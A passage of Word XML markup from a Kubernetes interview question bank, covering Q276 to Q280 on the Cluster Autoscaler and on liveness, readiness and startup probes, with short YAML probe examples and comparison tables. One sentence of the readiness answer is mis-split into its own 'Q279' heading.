        <w:t xml:space="preserve">      * HPA = hiring more workers or firing workers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommender → analyzes usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Updater → applies changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Admission Controller → sets initial values</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>VPA in Kubernetes is an autoscaling mechanism that automatically adjusts the CPU and memory resource requests and limits of containers based on observed usage patterns, helping optimize resource allocation for workloads that require stable per-pod performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q276. What is Cluster Autoscaler?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cluster Autoscaler in Kubernetes is a component that automatically adjusts the number of worker nodes in a cluster based on pending pods and resource demand.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Cluster Autoscaler scales the infrastructure (nodes), not pods.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not enough capacity → adds nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Underutilized nodes → removes nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handle workloads that exceed current node capacity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid pod scheduling failures (Pending state)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimize cloud cost by removing unused nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable fully automated cluster scaling</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Scale-up (add nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Scheduler finds pods that cannot be placed (Pending state)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Cluster Autoscaler detects insufficient resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. It requests new nodes from cloud provider</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. New nodes join the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Pending pods get scheduled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scale-down (remove nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Detects underutilized nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Checks if pods can be safely moved elsewhere</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Evicts pods and drains node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Removes node from cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow (conceptual)</w:t>
        <w:br/>
        <w:t>Pending Pods → Cluster Autoscaler → Cloud Provider → New Nodes → Scheduler → Pods scheduled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it runs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Usually deployed as a system pod inside the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with cloud providers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS (ASG / EKS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Azure (AKS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GCP (GKE)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key conditions for scaling down</w:t>
        <w:br/>
        <w:t>A node is removed only if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * All pods can be safely rescheduled</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods are not using local storage (or are safely managed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod disruption budgets allow it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No critical system workload is affected</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cluster Autoscaler vs HPA vs VPA</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster Autoscaler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scales</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Infrastructure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Application</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Trigger</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pending pods / utilization</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU/memory/custom metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usage patterns</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Effect</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Adds/removes machines</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Adds/removes replicas</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Changes CPU/memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a factory:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = workers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes = factory floors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster Autoscaler = construction manager who builds or removes floors based on worker demand</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with cloud provider APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Responds to unschedulable pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimizes cost automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works alongside HPA and VPA</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scaling is not instant (node provisioning delay)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Depends on cloud provider capacity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * May take time to stabilize during spikes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use with HPA for full elasticity (pods + nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Set proper resource requests for accurate scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use Pod Disruption Budgets for safe scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid aggressive scale-down settings in production</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Cluster Autoscaler in Kubernetes is a component that automatically adjusts the number of worker nodes in a cluster based on resource demand by adding nodes when pods are unschedulable and removing underutilized nodes to optimize cost and resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q277. Explain liveness probes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Liveness Probe in Kubernetes is a health check mechanism that tells the system whether a container is still running correctly or has become “stuck” or unhealthy.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A liveness probe answers: “Is this container alive?”</w:t>
        <w:br/>
        <w:t>If the probe fails, Kubernetes assumes the container is unhealthy and restarts it automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why liveness probes are used</w:t>
        <w:br/>
        <w:t>Containers can sometimes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hang (deadlock)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enter infinite loops</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stop responding without crashing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Become unhealthy but still “running”</w:t>
        <w:br/>
        <w:t>Liveness probes help Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detect unhealthy containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically restart them</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve application reliability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. kubelet periodically checks the container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. It runs the configured probe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. If the probe fails repeatedly:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes restarts the container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of liveness probes</w:t>
        <w:br/>
        <w:t>1. HTTP GET probe</w:t>
        <w:br/>
        <w:t>Checks a health endpoint.</w:t>
        <w:br/>
        <w:t>livenessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: /health</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 8080</w:t>
        <w:br/>
        <w:t xml:space="preserve">  initialDelaySeconds: 10</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 5</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. TCP Socket probe</w:t>
        <w:br/>
        <w:t>Checks if a port is open.</w:t>
        <w:br/>
        <w:t>livenessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tcpSocket:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 3306</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Command-based probe (Exec)</w:t>
        <w:br/>
        <w:t>Runs a command inside the container.</w:t>
        <w:br/>
        <w:t>livenessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - cat</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - /tmp/healthy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key parameters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * initialDelaySeconds → wait before first check</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * periodSeconds → how often to check</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * timeoutSeconds → how long to wait for response</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * failureThreshold → how many failures before restart</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens on failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Probe fails repeatedly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. kubelet marks container as unhealthy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Container is killed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Kubernetes restarts it (based on restartPolicy)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Liveness vs Readiness vs Startup probes</w:t>
        <w:br/>
        <w:t>Probe</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Action on failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Liveness</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Is container alive?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Readiness</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Can it serve traffic?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Remove from Service endpoints</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Has app started?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Delay other probes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a web server:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness probe = “Is the server frozen?”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If frozen → reboot the server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use liveness probes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Applications that may hang or deadlock</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Long-running services (web servers, APIs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Systems without automatic self-recovery</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid aggressive checks (don’t restart too quickly)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use lightweight endpoints like /health</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Combine with readiness probes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Set appropriate delays for slow-start apps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A liveness probe in Kubernetes is a health check mechanism used by the kubelet to determine whether a container is still running correctly, and if the probe fails, Kubernetes automatically restarts the container to recover from unhealthy or stuck states.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q278. What are readiness probes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Readiness Probe in Kubernetes is a health check used to determine whether a container is ready to accept traffic.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A readiness probe answers: “Can this container serve requests right now?”</w:t>
        <w:br/>
        <w:t>If it fails, Kubernetes does NOT restart the container—it only removes it from service routing.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why readiness probes are used</w:t>
        <w:br/>
        <w:t>Even if a container is running, it may not be ready because:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Application is still starting up</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database connection is not ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cache is warming up</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependency services are unavailable</w:t>
        <w:br/>
        <w:t>Readiness probes ensure:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only healthy pods receive traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No request is sent to an unready pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Zero downtime deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. kubelet periodically checks the container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Runs the configured probe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. If probe fails:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod is marked NotReady</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removed from Service endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q279. When probe passes again:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: * Pod is added back to traffic flow</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of readiness probes</w:t>
        <w:br/>
        <w:t>1. HTTP GET probe</w:t>
        <w:br/>
        <w:t>Checks an endpoint like /ready</w:t>
        <w:br/>
        <w:t>readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: /ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 8080</w:t>
        <w:br/>
        <w:t xml:space="preserve">  initialDelaySeconds: 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 5</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. TCP Socket probe</w:t>
        <w:br/>
        <w:t>Checks if a port is open</w:t>
        <w:br/>
        <w:t>readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tcpSocket:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 3306</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Exec probe</w:t>
        <w:br/>
        <w:t>Runs a command inside container</w:t>
        <w:br/>
        <w:t>readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - cat</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - /tmp/ready</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens when it fails</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod status → NotReady</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removed from Service load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No traffic is sent to it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container keeps running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Readiness vs Liveness (important difference)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Readiness Probe</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Liveness Probe</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Can it serve traffic?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Is it alive?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Failure action</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Remove from Service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✔ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup/availability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Crash/hang detection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness probe = “Is the restaurant open or completely broken?”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Readiness probe = “Is the kitchen ready to serve customers?”</w:t>
        <w:br/>
        <w:t>A restaurant may be open but still not ready to serve food.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use readiness probes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Applications with slow startup</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Microservices with external dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * During rolling updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * APIs that require initialization</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use lightweight health endpoints (/ready)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid heavy database calls in probe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Combine with liveness probe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensure quick response times</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A readiness probe in Kubernetes is a health check used by the kubelet to determine whether a container is ready to serve traffic, and if it fails, the pod is removed from service endpoints without being restarted, ensuring only healthy pods receive requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q280. Explain startup probes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Startup Probe in Kubernetes is a health check used to determine whether a container application has finished its initialization phase and has started successfully.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A startup probe answers: “Has this application finished starting up?”</w:t>
        <w:br/>
        <w:t>It is designed for slow-starting applications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why startup probes are needed</w:t>
        <w:br/>
        <w:t>Some applications take a long time to initialize, for example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Java Spring Boot apps (JVM warm-up)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large microservices loading models</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Databases performing recovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Legacy applications with heavy startup logic</w:t>
        <w:br/>
        <w:t>Without a startup probe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness probe may run too early</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes might restart a perfectly fine container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Container starts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Only startup probe runs initially</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. If startup probe keeps failing:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes keeps waiting (no liveness/readiness checks yet)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Once startup probe succeeds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness and readiness probes are enabled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Startup probe runs only during startup phase</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * After success, it is disabled permanently for that container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>HTTP startup probe</w:t>
        <w:br/>
        <w:t>startupProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: /startup</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 8080</w:t>
        <w:br/>
        <w:t xml:space="preserve">  failureThreshold: 30</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 10</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Exec startup probe</w:t>
        <w:br/>
        <w:t>startupProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - cat</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - /tmp/started</w:t>
        <w:br/>
        <w:t xml:space="preserve">  failureThreshold: 30</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 5</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important parameters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * failureThreshold → how many failures allowed before marking failed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * periodSeconds → how often to check</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * timeoutSeconds → max time to wait for response</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens if startup probe fails</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container is restarted</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness and readiness probes are NOT evaluated until startup succeeds</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Startup vs Liveness vs Readiness</w:t>
        <w:br/>
        <w:t>Probe</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>When active</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Action on failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Has app started?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Only at startup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Liveness</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Is app healthy?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>After startup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Readiness</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Can it serve traffic?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>After startup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Remove from service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a machine in a factory:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Startup probe = “Has the machine finished booting and calibration?”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness probe = “Is the machine still running properly?”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Readiness probe = “Is it ready to process products?”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why startup probe is important</w:t>
        <w:br/>
        <w:t>It prevents:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * False restarts of slow apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Conflicts between startup delay and liveness checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Unstable deployments in heavy initialization systems</w:t>
        <w:br/>
